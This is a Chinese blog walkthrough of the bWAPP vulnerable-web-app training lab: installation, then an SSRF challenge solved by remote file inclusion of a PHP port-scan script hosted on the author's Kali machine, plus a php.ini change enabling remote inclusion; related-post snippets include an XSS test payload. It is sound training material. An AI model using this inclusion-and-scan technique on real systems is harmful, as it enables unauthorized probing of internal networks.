bWAPP靶场实战

最新推荐文章于 2024-07-03 12:39:41 发布
最新推荐文章于 2024-07-03 12:39:41 发布
阅读量3.1k 收藏 19
点赞数 3
分类专栏: # 漏洞靶场 文章标签: bwapp bwapp靶场 漏洞靶场
学习之路长且漫,长情与君总会见!
本文链接:https://blog.csdn.net/Aaron_Miller/article/details/106135833
版权

文章目录


在这里插入图片描述

一、靶场介绍

  集成了超过100余个网络漏洞,php web漏洞靶场,能够调制漏洞难度等级(低->中->高)。

二、靶场搭建

2.1 安装类型

搭建类型有两种:(虚拟机版本可测试测漏洞类型更多,比如破壳、心脏滴血)

  • 独立安装(部署到apache + php +mysql环境下)
  • 虚拟机安装(bee-box)

2.2 独立安装

》》下载解压bwapp到本地web目录下
在这里插入图片描述
》》编辑如下文件
在这里插入图片描述
》》访问如下地址,进行安装初始化
在这里插入图片描述
》》安装完成
在这里插入图片描述
》》输入用户名:密码,选择安全等级进行登录
在这里插入图片描述
》》登录成功
在这里插入图片描述

三、漏洞实战

SSRF

》》选择SSRF漏洞,点击Hack
在这里插入图片描述
》》如下的三个攻击场景

  • 利用远程文件包含进行端口扫描(内网探测)
  • 使用XXE进行文件读取(文件读取)
  • 使用XXE进行SmartTV拒绝服务利用(漏洞利用)
    在这里插入图片描述
远程文件包含端口扫描
  • 这里利用的HTTP协议

》》点击任务1中如下位置,获取端口扫描脚本
在这里插入图片描述
》》如果没有拿到,可以去如下文件位置取出
在这里插入图片描述
》》进入远程文件包含漏洞模块处进行利用
在这里插入图片描述
》》选择语言点击Go
在这里插入图片描述
》》可查看到get请求地址中请求的资源文件
在这里插入图片描述
》》这里我们远程包含一台其它服务器资源验证远程包含是否成功(kali:192.168.226.134)
在这里插入图片描述
》》我们将之前的ssrf-1.txt端口扫描文件放入到kali的web目录下:
在这里插入图片描述
(ssrf-1.txt脚本内容(php端口扫描脚本))

<?php

if(isset($_REQUEST["ip"]))
{
    //list of port numbers to scan
    $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
    $results = array();
    foreach($ports as $port)
    {

        if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
        {
            $results[$port] = true;
            fclose($pf); 
        }
        else
        {
            $results[$port] = false;        
        }
    }
 
    foreach($results as $port=>$val)
    {

        $prot = getservbyport($port,"tcp");
        echo "Port $port ($prot): ";

        if($val)
        {
            echo "<span style=\"color:green\">OK</span><br/>";
        }
        else
        {
            echo "<span style=\"color:red\">Inaccessible</span><br/>";
        }
    }
}
?>

》》利用远程包含探测端口

需要利用hackbar传入post目标地址的ip,从下方可直观看出扫描处的端口

在这里插入图片描述
》》也可以扫远程内网的其它主机(如这里的kali)
在这里插入图片描述

Tips:
问题:文件包含时报如下错误:
在这里插入图片描述
解决:
找到对应版本的php.ini php配置文件
在这里插入图片描述
启动远程文件包含(默认关闭)
在这里插入图片描述
保存文件重启服务

風月长情
关注
专栏目录
bWAPP靶场搭建
AboutLzs的博客
05-23 1226
下载链接:Download bWAPP from SourceForge.net 1、首先将文件解压到www目录下 2、打开并运行phpstudy,访问页面http://127.0.0.1/bWAPP/install.php ,点击here新建数据库 3、新建完数据库点击登录, 4、进入登录页面,默认账号bee密码bug。完成登录。 ...
20210113bwapp html inject 全难度通关详解
qq_45290991的博客
01-14 830
HTML注入类似于xss注入但又不是,因为他的威胁程度大于后者,它可以在HTML页面中嵌入如何可以执行的代码,实际上它是所有注入类代码漏洞的鼻祖 目录 HTML Injection - Reflected (GET) low medium high HTML Injection - Reflected (POST) HTML Injection - Reflected (URL) low medium high HTML Injection - Stored (Blog) low
搭建BWAPP靶场(详细过程)
m0_52701599的博客
03-22 2796
搭建BWAPP靶场(详细)
bWAPP靶场安装
最新发布
CheatMyself的博客
07-03 450
打开:D:\ProgramFiles\phpstudy_pro\WWW\bWAPP-master\app\admin下的settings.php,的数据库账号密码。百度网盘地址:链接:https://pan.baidu.com/s/1Y-LvHxyW7SozGFtHoc9PKA。链接:https://pan.baidu.com/s/1pr9v0_p6mgChvWcIx1dn7g。git地址:https://github.com/raesene/bWAPP。–来自百度网盘超级会员V5的分享。
Web安全:bWAPP 靶场搭建.(集成了各种常见漏洞和最新漏洞的开源Web应用程序)
网络安全领域___专研者.
06-15 3300
bWAPP是一个集成了了常见漏洞的 web 应用程序,目的是作为漏洞测试的演练场,帮助安全爱好者,开发人员和学生发现和防止Web漏洞。它有超过100个网络漏洞数据,包括所有主要的已知网络漏洞.
BWAPP靶场-HTML injection-Reflected(POST)
asmartrman的博客
05-06 260
0x00分析 测试过程中要注意GET请求与POST请求的不同,注意传入参数方式,其他部分与GET请求部分基本相同 0x01 LOW 源码: 没有进行过滤,随便测试一下 firstname输入 <script>alert(1)</script> Last name随意输入 外连接:Last name随意输入,First name输入 <a href="http://www.baidu.com">111</a> 点击111即可完..
bWAPP靶场搭建——直接使用虚拟机镜像导入配置
CoffeMilk的博客
12-27 2938
bWAPP是一款非常好用的免费的、开源漏洞演示学习平台;它有100多个网络错误!且它涵盖了所有已知的主要web漏洞,包括OWASP Top 10项目的所有风险。bWAPP是一个使用MySQL数据库的PHP应用程序;它可以通过Apache/IIS和MySQL托管在Linux/Windows上。WAMP或XAMPP支持它。也可以下载bee-box镜像(即bee-box镜像是一个预先安装了bWAPP靶场的定制虚拟机环境,开箱即用,十分方便)。
XXE漏洞(2)漏洞实战
jelly
07-07 2186
本次测试XXE主要在靶机上安装了bWAPP程序,中间有一关为XXE漏洞很好做测试了解XXE漏洞。 靶机:192.168.56.101 攻击机kali:192.168.56.1 目录 了解XXE漏洞原理 漏洞成因 怎么判断网站是否存在XXE漏洞 基本利用 XML漏洞利用 任意文件读取 有回显的xxe利用 读取特殊符号文件 没有回显读取文档的方式 内网探测 DDOS攻击 XXE漏洞防御 了解XXE漏洞原理 漏洞成因 XXE漏洞全称XML External Entity ...
全!CTF靶场、渗透实战靶场总结 (适合收藏)
热门推荐
Appleteachers的博客
05-20 3万+
CTF靶场、渗透实战靶场总结 (适合收藏) CTF靶场:CTF刷题,在校生备战CTF比赛,信安入门、提升自己、丰富简历之必备(一场比赛打出好成绩,可以让你轻松进大厂,如近期的美团杯); 渗透实战靶场:挖洞、渗透实战(web、域、横向渗透),适合实战能力需要大幅度提升的同学。 目录 ▶0x01 CTF赛事发布网站 ▶0x02 CTF在线靶场 ▶0x03 漏洞靶场(本地搭建) ▶0x04 渗透实战靶场 0x01 CTF赛事发布网站 i春秋和XCTF社区经常会发布各类CTF赛事 i春秋: https://www.
靶场.zip
01-08
2. **bWAPP_latest.zip**: bWAPP(即"Bad Web Applications")是一个完整的Web应用程序,设计有各种常见安全漏洞,如SQL注入、XSS、命令注入等。它是安全专业人士和开发者的练习平台,用于提高对Web应用安全的理解和...
Web渗透漏洞靶场收集
2401_84281655的博客
04-26 762
基于Java编写的漏洞靶场,提供了一个真实的安全教学环境,用于进行WEB漏洞测试和练习。
bWAPP靶场——下载与安装(Windows最全)
weixin_45923850的博客
10-22 1万+
###下载
网络安全入门篇:bwapp靶场通关(更新ing)
weicanglv3545的博客
08-12 3046
bwapp是一个覆盖范围非常广的漏洞靶场,非常适合初学者入门使用。 本篇文章中使用的bwapp是docker安装,因此有一些漏洞不能很好的支持。 如果想获得完整体验,可下载bee-box,一个预装了bwapp的Linux VM。...
Docker搭建BWAPP靶场
weixin_47767605的博客
05-17 914
buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵盖了所有主要的已知Web漏洞,包括OWASP Top10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。 通过Docker hub搭建为了大家方便使用,已经push到了docker hub上面。如果大家对docker不了解的话,可以先去docker官网学习一下。 docker官网...
安装bwapp漏洞靶场以及相关实验
weixin_53872203的博客
04-16 2497
本文章仅供参考学习使用,不做任何违法的行为!!! 一.安装bwapp 1.查找bwapp镜像,选择下载最多的镜像 docker search bwapp 2.docker pull 镜像名称 3.开启相对应的端口 docker run --name bwapp -d -p 80:80 raesene/bwapp 4.浏览器访问:http://xxxxxxxx:80/login.php,会有如下提示: Connection failed: Unknown database 'bWAPP' 5
bWAPP靶场之iFrame Injection
0nc3的博客
04-03 997
前言 iframe是可用于在HTML页面中嵌入一些文件(如文档,视频等)的一项技术。对iframe最简单的解释就是“iframe是一个可以在当前页面中显示其它页面内容的技术”。 通过利用iframe标签对网站页面进行注入,是利用了HTML标签,实际上就是一个阅读器,可以阅读通过协议加载的活服务器本地的文件、视频等 靶场练习 输出代码 <?php if($_COOKIE["securi...
bwapp靶场笔记 -SQL注入篇
m0_52149675的博客
10-30 1591
​启动靶场
bWAPP实验
tbygadgjsad的博客
03-07 173
首先登陆靶场 找到ssrf点击hack 点击选框 出现代码后复制 然后在网站根目录下建立一个1.txt,把代码粘贴后保存。 回到页面点击bugs找到RFI/LFI后点击hack。 点击Go 之后打开HackBar 把lang_en.php修改为http://192.168.5.35(本机IP)/1.txt,然后勾选post data,输入ip=192.168.5.35 出现后点击确定查看。 实验结束。 ...
win10 bwapp靶场搭建
07-25
为了在Windows 10上搭建bwapp靶场,你需要进行以下步骤: 1. 下载并安装适用于Windows的XAMPP。你可以从 Apache Friends 的官方网站(https://www.apachefriends.org/index.html)下载最新版本。 2. 安装完成后,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

風月长情

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值